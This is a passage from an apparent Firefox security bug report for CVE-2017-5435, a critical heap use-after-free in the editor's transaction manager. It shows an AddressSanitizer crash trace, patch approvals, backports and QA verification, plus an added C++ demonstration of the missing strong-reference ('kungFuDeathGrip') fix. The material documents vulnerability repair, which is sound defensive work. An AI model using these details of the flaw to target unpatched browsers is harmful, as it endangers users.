    #4 0x7f278dddfac1 in EndEditorInit /home/worker/workspace/build/src/editor/libeditor/TextEditor.cpp:221:3
    #5 0x7f278dddfac1 in mozilla::AutoEditInitRulesTrigger::~AutoEditInitRulesTrigger() /home/worker/workspace/build/src/editor/libeditor/TextEditUtils.cpp:109
    #6 0x7f278dd3ce59 in mozilla::HTMLEditor::Init(nsIDOMDocument*, nsIContent*, nsISelectionController*, unsigned int, nsAString const&) /home/worker/workspace/build/src/editor/libeditor/HTMLEditor.cpp:316:3
    #7 0x7f278de39b24 in nsEditingSession::SetupEditorOnWindow(mozIDOMWindowProxy*) /home/worker/workspace/build/src/editor/composer/nsEditingSession.cpp:454:16
    #8 0x7f278de368c0 in nsEditingSession::MakeWindowEditable(mozIDOMWindowProxy*, char const*, bool, bool, bool) /home/worker/workspace/build/src/editor/composer/nsEditingSession.cpp:173:10
    #9 0x7f278c5e67d0 in nsHTMLDocument::EditingStateChanged() /home/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:2843:25
    #10 0x7f278c5faded in SetDesignMode /home/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:2956:10
    #11 0x7f278c5faded in nsHTMLDocument::SetDesignMode(nsAString const&, nsIPrincipal&, mozilla::ErrorResult&) /home/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:2939
    #12 0x7f278bb573d7 in mozilla::dom::HTMLDocumentBinding::set_designMode(JSContext*, JS::Handle<JSObject*>, nsHTMLDocument*, JSJitSetterCallArgs) /home/worker/workspace/build/src/obj-firefox/dom/bindings/HTMLDocumentBinding.cpp:757:9
    #13 0x7f278bdf29dc in mozilla::dom::GenericBindingSetter(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2921:8
    #14 0x7f27915c3e53 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #15 0x7f27915c3e53 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:454
    #16 0x7f27915c5b69 in InternalCall /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:499:12
    #17 0x7f27915c5b69 in Call /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518
    #18 0x7f27915c5b69 in js::CallSetter(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::Handle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:647
    #19 0x7f2792458f1a in SetExistingProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2473:10
    #20 0x7f2792458f1a in js::NativeSetProperty(JSContext*, JS::Handle<js::NativeObject*>, JS::Handle<jsid>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::QualifiedBool, JS::ObjectOpResult&) /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2508
    #21 0x7f279217bbda in SetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1460:12
    #22 0x7f279217bbda in js::SetPropertyIgnoringNamedGetter(JSContext*, JS::Handle<JSObject*>, JS::Handle<jsid>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::Handle<JS::PropertyDescriptor>, JS::ObjectOpResult&) /home/worker/workspace/build/src/js/src/proxy/BaseProxyHandler.cpp:182
    #23 0x7f278bdfde54 in mozilla::dom::DOMProxyHandler::set(JSContext*, JS::Handle<JSObject*>, JS::Handle<jsid>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::ObjectOpResult&) const /home/worker/workspace/build/src/dom/bindings/DOMJSProxyHandler.cpp:258:10
    #24 0x7f27921acef1 in js::Proxy::set(JSContext*, JS::Handle<JSObject*>, JS::Handle<jsid>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::ObjectOpResult&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:369:21
    #25 0x7f279209d19d in JSObject::nonNativeSetProperty(JSContext*, JS::Handle<JSObject*>, JS::Handle<jsid>, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::ObjectOpResult&) /home/worker/workspace/build/src/js/src/jsobj.cpp:1049:12
    #26 0x7f27915a599c in SetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1459:16
    #27 0x7f27915a599c in SetPropertyOperation /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:243
    #28 0x7f27915a599c in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2789
    #29 0x7f27915925fe in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:394:12
    #30 0x7f27915c3fd8 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:472:15
    #31 0x7f27915c4802 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
    #32 0x7f27921ce96e in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #33 0x7f2792185164 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:353:23
    #34 0x7f27921aee83 in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:464:21
    #35 0x7f27921b17e7 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:716:12
    #36 0x7f27915c41a3 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #37 0x7f27915c41a3 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:436
    #38 0x7f27915c4802 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:518:10
    #39 0x7f2791f4142b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2887:12
    #40 0x7f278b895c95 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37

SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/xpcom/ds/nsDeque.cpp:260:7 in nsDeque::Pop()
Shadow bytes around the buggy address:
  0x0c2880020530: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
  0x0c2880020540: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c2880020550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2880020560: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2880020570: 00 00 00 00 00 00 00 00 00 00 03 fa fa fa fa fa
=>0x0c2880020580: fa fa fa fa fa fa fa fa fd fd fd fd[fd]fd fd fd
  0x0c2880020590: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c28800205a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c28800205b0: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
  0x0c28800205c0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c28800205d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==12221==ABORTING
Do you have time to look at this, Masayuki?
Flags: needinfo?(masayuki)
Keywords: csectype-uaf, sec-critical
Hmm, my queue is already full...
Flags: needinfo?(masayuki)
(Assignee)

Comment 3

2 years ago
Based on stack trace, this is effectively a missing kungfuDeathGrip
Assignee: nobody → bugs
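The "missing kungfuDeathGrip" diagnosis above is the only root-cause statement on this page, so here is an added C++ illustration of that pattern. It is not Gecko code and not the attached patch: `TxnManager`, `Editor`, `RefPtr`, `gLiveTxnManagers` and the listener callback are hypothetical stand-ins for the transaction manager, its owner (`mTxnMgr`), mozilla's `RefPtr` and the re-entrant script run while a transaction ends. The unsafe variant detects that `this` was destroyed via a global counter instead of touching freed memory, so the demo stays defined-behaviour while showing where the real build read the freed nsDeque.

```cpp
#include <cstdio>
#include <functional>
#include <utility>
#include <vector>

// Hypothetical stand-ins for nsISupports-style refcounting and mozilla::RefPtr.
// Added illustration of the "missing kungFuDeathGrip" pattern; not Gecko code.
static int gLiveTxnManagers = 0;  // lets the demo observe destruction without reading freed memory

template <typename T>
class RefPtr {
 public:
  RefPtr() : mPtr(nullptr) {}
  explicit RefPtr(T* p) : mPtr(p) { if (mPtr) mPtr->AddRef(); }
  RefPtr(const RefPtr& o) : RefPtr(o.mPtr) {}
  ~RefPtr() { if (mPtr) mPtr->Release(); }
  RefPtr& operator=(T* p) {
    if (p) p->AddRef();            // AddRef the new pointee first so self-assignment is safe
    T* old = mPtr;
    mPtr = p;
    if (old) old->Release();
    return *this;
  }
  RefPtr& operator=(const RefPtr& o) { return *this = o.mPtr; }
  T* get() const { return mPtr; }
  T* operator->() const { return mPtr; }
 private:
  T* mPtr;
};

class TxnManager {
 public:
  enum class Result { Ok, SelfDestroyedDuringCallback };
  using Listener = std::function<void()>;

  TxnManager() { ++gLiveTxnManagers; }
  ~TxnManager() { --gLiveTxnManagers; }

  void AddRef() { ++mRefCnt; }
  void Release() { if (--mRefCnt == 0) delete this; }

  void SetListener(Listener l) { mListener = std::move(l); }
  void BeginTransaction() { mTxnStack.push_back(static_cast<int>(mTxnStack.size()) + 1); }

  // Shape of the bug: notifying a listener can re-enter script, and script can drop
  // the last strong reference to this manager. Touching a member afterwards (the real
  // bug popped an nsDeque) is a use-after-free.
  Result EndTransactionUnsafe() {
    Listener listener = mListener;   // local copy: the callable itself must outlive |this|
    if (listener) listener();
    if (gLiveTxnManagers == 0) {
      // |this| has been deleted. A real build would now read freed memory in the pop
      // below; the demo bails out so the hazard is observable without undefined behaviour.
      return Result::SelfDestroyedDuringCallback;
    }
    mTxnStack.pop_back();
    return Result::Ok;
  }

  // Fix: a local strong reference keeps |this| alive for the whole call, whatever the
  // callback releases. The object is freed when the grip goes out of scope on return.
  Result EndTransactionSafe() {
    RefPtr<TxnManager> kungFuDeathGrip(this);
    Listener listener = mListener;
    if (listener) listener();
    mTxnStack.pop_back();          // safe: refcount is still at least 1 here
    return Result::Ok;
  }

 private:
  int mRefCnt = 0;
  Listener mListener;
  std::vector<int> mTxnStack;
};

// The owner, like an editor's mTxnMgr member.
struct Editor {
  RefPtr<TxnManager> mTxnMgr{new TxnManager()};
};

// Run one EndTransaction while a "script" listener tears down the owner's reference,
// the way designMode='off' in the testcase tears the editor down mid-transaction.
TxnManager::Result RunScenario(bool withDeathGrip) {
  Editor editor;
  TxnManager* mgr = editor.mTxnMgr.get();
  mgr->SetListener([&editor] { editor.mTxnMgr = nullptr; });  // drops the only strong ref
  mgr->BeginTransaction();
  return withDeathGrip ? mgr->EndTransactionSafe() : mgr->EndTransactionUnsafe();
}

int main() {
  bool unsafeOk = RunScenario(false) == TxnManager::Result::Ok;
  bool safeOk = RunScenario(true) == TxnManager::Result::Ok;
  std::printf("without grip: %s\n", unsafeOk ? "ok" : "self destroyed during callback (UAF in a real build)");
  std::printf("with grip:    %s\n", safeOk ? "ok" : "self destroyed during callback");
  std::printf("live managers after both runs: %d\n", gLiveTxnManagers);
  return 0;
}
```

The same discipline applies on the caller's side, which is what "other cases when mTxnMgr is used in a similar way" points at: a caller that can have its member cleared from under it takes its own `RefPtr<TxnManager> txnMgr = mTxnMgr;` before calling into it, rather than dereferencing the member after script may have run.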
(Assignee)

Comment 4

2 years ago
Posted patch: patch
This should help.
I went through also other cases when mTxnMgr is used in a similar way.
Attachment #8852031 - Flags: review?(masayuki)
Group: core-security → dom-core-security
(Assignee)

Comment 5

2 years ago
Comment on attachment 8852031 [details] [diff] [review]
patch

[Security approval request comment]
How easily could an exploit be constructed based on the patch?
Not very easily

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?
Commit message could be rather vague
"Bug 1350683, ensure the transaction processing, r=masayuki"
The patch itself tells quite well what the issue is.

Which older supported branches are affected by this flaw?
All. Old code

Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?
the patch seems to apply to beta too

How likely is this patch to cause regressions; how much testing does it need?
Should be safe
Attachment #8852031 - Flags: sec-approval?
Attachment #8852031 - Flags: approval-mozilla-beta?
Attachment #8852031 - Flags: approval-mozilla-aurora?
Marking affected versions and giving sec-approval+ for trunk and the two main branches. We'll want ESR52 and ESR45 patches made and nominated as well.
status-firefox52: --- → wontfix
status-firefox53: --- → affected
status-firefox54: --- → affected
status-firefox-esr45: --- → affected
status-firefox-esr52: --- → affected
tracking-firefox53: --- → +
tracking-firefox54: --- → +
tracking-firefox55: --- → +
tracking-firefox-esr45: --- → 53+
tracking-firefox-esr52: --- → 53+
Attachment #8852031 - Flags: sec-approval?
Attachment #8852031 - Flags: sec-approval+
Attachment #8852031 - Flags: approval-mozilla-beta?
Attachment #8852031 - Flags: approval-mozilla-beta+
Attachment #8852031 - Flags: approval-mozilla-aurora?
Attachment #8852031 - Flags: approval-mozilla-aurora+
Comment on attachment 8852031 [details] [diff] [review]
patch

This grafts cleanly to esr52 and requires a tiny rebase for esr45 (s/rv/res in one spot).
Attachment #8852031 - Flags: approval-mozilla-esr52?
Attachment #8852031 - Flags: approval-mozilla-esr45?
Comment on attachment 8852031 [details] [diff] [review]
patch

prevent use after free, esr45+, esr52+
Attachment #8852031 - Flags: approval-mozilla-esr52?
Attachment #8852031 - Flags: approval-mozilla-esr52+
Attachment #8852031 - Flags: approval-mozilla-esr45?
Attachment #8852031 - Flags: approval-mozilla-esr45+
https://hg.mozilla.org/mozilla-central/rev/5e91448f4b30
Status: NEW → RESOLVED
Last Resolved: 2 years ago
status-firefox55: affected → fixed
Resolution: --- → FIXED
Target Milestone: --- → mozilla55
Group: dom-core-security → core-security-release
Whiteboard: [adv-main53+][adv-esr52.1+][adv-esr45.9+]
Alias: CVE-2017-5435
Flagging this for manual testing, testcase in Comment 0.
Flags: qe-verify+
Whiteboard: [adv-main53+][adv-esr52.1+][adv-esr45.9+] → [adv-main53+][adv-esr52.1+][adv-esr45.9+][post-critsmash-triage]
Flags: sec-bounty?
Flags: sec-bounty? → sec-bounty+
I managed to reproduce the issue on Firefox 55.0a1(Build ID 20170326225108) asan Debug build, under Ubuntu 16.04x64.

The crash is no longer reproducible on Firefox 55.0a1(2017-04-13) ASAN build, Firefox 54.0a2(2017-04-13) ASAN build, 53.0b12 ASAN build, 53.0 ASAN build, Firefox 52.1.0 ESR ASAN build, 55.0a1(2017-04-17) build, Firefox 54.0a2(2017-04-17), Firefox 53.0 or on Firefox 52.1.0 ESR.
Tests were performed under Ubuntu 16.04x64.

Note that on Firefox 45.9.0 ESR ASAN and Firefox 45.9.0 ESR builds the tests were performed without installing domfuzz_helper-2012.07.07-fx+fn+an.xpi, since it's not compatible with these two builds.
Status: RESOLVED → VERIFIED
status-firefox53: fixed → verified
status-firefox54: fixed → verified
status-firefox55: fixed → verified
status-firefox-esr45: fixed → verified
status-firefox-esr52: fixed → verified
Flags: qe-verify+
Group: core-security-release